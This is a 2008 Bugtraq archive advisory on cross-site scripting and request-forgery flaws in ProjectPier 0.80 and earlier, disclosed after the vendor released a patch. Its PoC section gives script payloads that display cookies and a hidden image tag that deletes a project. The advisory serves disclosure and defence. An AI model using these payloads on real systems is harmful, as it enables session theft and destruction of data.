Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
From: L4teral <l4teral () gmail com>
Date: Mon, 18 Feb 2008 00:03:29 +0100
======================================================================
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
======================================================================

Author:          L4teral <l4teral [4t] gmail com>
Impact:          Cross Site Scripting
                 Cross Site Request Forgery
Status:          patch available


------------------------------
Affected software description:
------------------------------

Application:     ProjectPier
Version:         <= 0.80
Vendor:          http://www.projectpier.org

Description:
ProjectPier is a Free, Open-Source, self-hosted PHP application for
managing tasks, projects and teams through an intuitive web interface.
ProjectPier will help your organization communicate, collaborate and
get things done Its function is similar to commercial
groupware/project management products, but allows the freedom and
scalability of self-hosting. Even better, it will always be free.


--------------
Vulnerability:
--------------

1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
   A project e.g. can be deleted with a simple GET request (see PoC).
   Combined with the XSS vulnerabilies, the code can be embedded into
   a message - if an admin views it, the browser will send the request
   to delete a project without being visible to the admin.


------------
PoC/Exploit:
------------

1.
http://localhost/projectpier/index.php?c=access";><script>alert('xss')</script>&a=login"><script>alert(document.cookie)</script>

2.
create a message with <script>alert(document.cookie)</script>

3.
create a milestone with <script>alert(document.cookie)</script>

4.
set the display name in the profile to <script>alert(document.cookie)</script>

5.
<img src="http://localhost/projectpier/index.php?c=project&a=delete&id=1&active_project=1";
width="0" height="0">


---------
Solution:
---------

update to version 0.8.0.1 or above.


---------
Timeline:
---------

2007-10-24 - vendor informed
2007-10-24 - vendor responded
2008-02-13 - vendor released new version
2008-02-17 - public disclosure

  By Date           By Thread  

Current thread:
  • ProjectPier <= 0.80 Cross Site Scripting and Request Forgery L4teral (Feb 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]